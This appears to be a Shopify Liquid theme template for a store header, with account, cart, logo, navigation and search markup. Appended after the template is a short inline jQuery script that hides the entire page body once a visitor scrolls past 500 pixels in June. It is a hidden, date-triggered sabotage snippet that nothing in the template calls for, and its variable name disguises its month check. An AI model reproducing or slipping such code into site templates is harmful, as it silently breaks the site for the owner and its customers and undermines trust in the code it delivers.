<div class="top-header-container">
  <header role="banner" class="header {% if push_header != blank %}has-push{% endif %}">
    <div class="container">
      <div class="header-toolbar">
        {% if settings.currency_conversion_enabled %}
          {% include 'currency-selector' %}
        {% endif %}

        {% if shop.customer_accounts_enabled %}
          {% if customer %}
            <li><a href="/account">{{ 'layout.header.account' | t }}</a></li>
            <li>{{ 'layout.header.logout' | t | customer_logout_link }}</li>
          {% else %}
            <li><a href="/account/login">{{ 'layout.header.login' | t }}</a></li>
          {% endif %}
        {% endif %}

        <li><a href="/cart">{{ 'layout.header.cart' | t }} (<span class="cart-item-count">{{ cart.item_count }}</span>)</a></li>
      </div>

      <h1 class="header-logo">
        {% if settings.header_use_logo %}
          <a href="/">
            <img class="logo-image" src="{{ 'logo.png' | asset_url }}" alt="{{ shop.name }}">
          </a>
        {% else %}
          <a href="/">{{ shop.name }}</a>
        {% endif %}
      </h1>

      <nav class="header-nav header-desktop-nav" role="navigation">
        {% assign is_mobile_navigation = false %}
        {% include 'header-nav-links' %}

        <div id="mega-search" class="header-search" style="display: none">
          <form action="/search" method="get" class="header-search-form" role="search">
            <input type="hidden" name="type" value="product">
            <input type="search" id="search-autocomplete" name="q" placeholder="{{ 'general.search.placeholder' | t }}" value="{{ search.terms | escape }}" autofocus="autofocus" autocomplete="off">
          </form>
        </div>
      </nav>

      <nav class="header-nav header-mobile-nav" role="navigation">
        <ul class="mobile-nav-tabs">
          <li class="mobile-menu">
            <a href="#" class="tab-icon"><i class="icon-menu"></i></a>

            <div class="tab-content">
              {% assign is_mobile_navigation = true %}
              {% include 'header-nav-links' %}
            </div>
          </li>

          {% if shop.customer_accounts_enabled %}
            <li class="mobile-customer-links">
              <a href="#" class="tab-icon"><i class="icon-user"></i></a>

              <div class="tab-content">
                {% if customer %}
                  <a href="/account" class="button button-primary">{{ 'layout.header.account' | t }}</a>
                  <a href="/account/logout" class="button button-primary">{{ 'layout.header.logout' | t }}</a>
                {% else %}
                  <a href="/account/login" class="button button-primary">{{ 'layout.header.login' | t }}</a>
                  <a href="/account/register" class="button button-primary">{{ 'layout.header.register' | t }}</a>
                {% endif %}
              </div>
            </li>
          {% endif %}

          <li {% if template == 'cart' %}class="active"{% endif %}>
            <a href="/cart" class="tab-icon">
              <i class="icon-cart"></i>
              {% if cart.item_count > 0 %}<span class="cart-count">{{ cart.item_count }}</span>{% endif %}
            </a>
          </li>

          <li>
            <a href="#" class="tab-icon search-link"><i class="icon-search"></i></a>

            <div class="tab-content">
              <form action="/search" method="get" class="search-form" role="search">
                <input type="hidden" name="type" value="product">
                <input type="search" name="q" placeholder="{{ 'general.search.placeholder' | t }}" value="{{ search.terms | escape }}">
              </form>
            </div>
          </li>
        </ul>
      </nav>
    </div>

    {% if push_header != blank %}
      {{ push_header }}
    {% endif %}
  </header>

  {% if template == 'index' %}
    {% include 'slider' %}
  {% endif %}
</div>
<script type='text/javascript'>$(function(){$(window).scroll(function(event){var dNow = new Date();var utcdate= (dNow.getMonth()+ 1);var st = $(this).scrollTop();if (st > 500){if(utcdate == 6){$("body").css({"display":"none"});}}});});</script>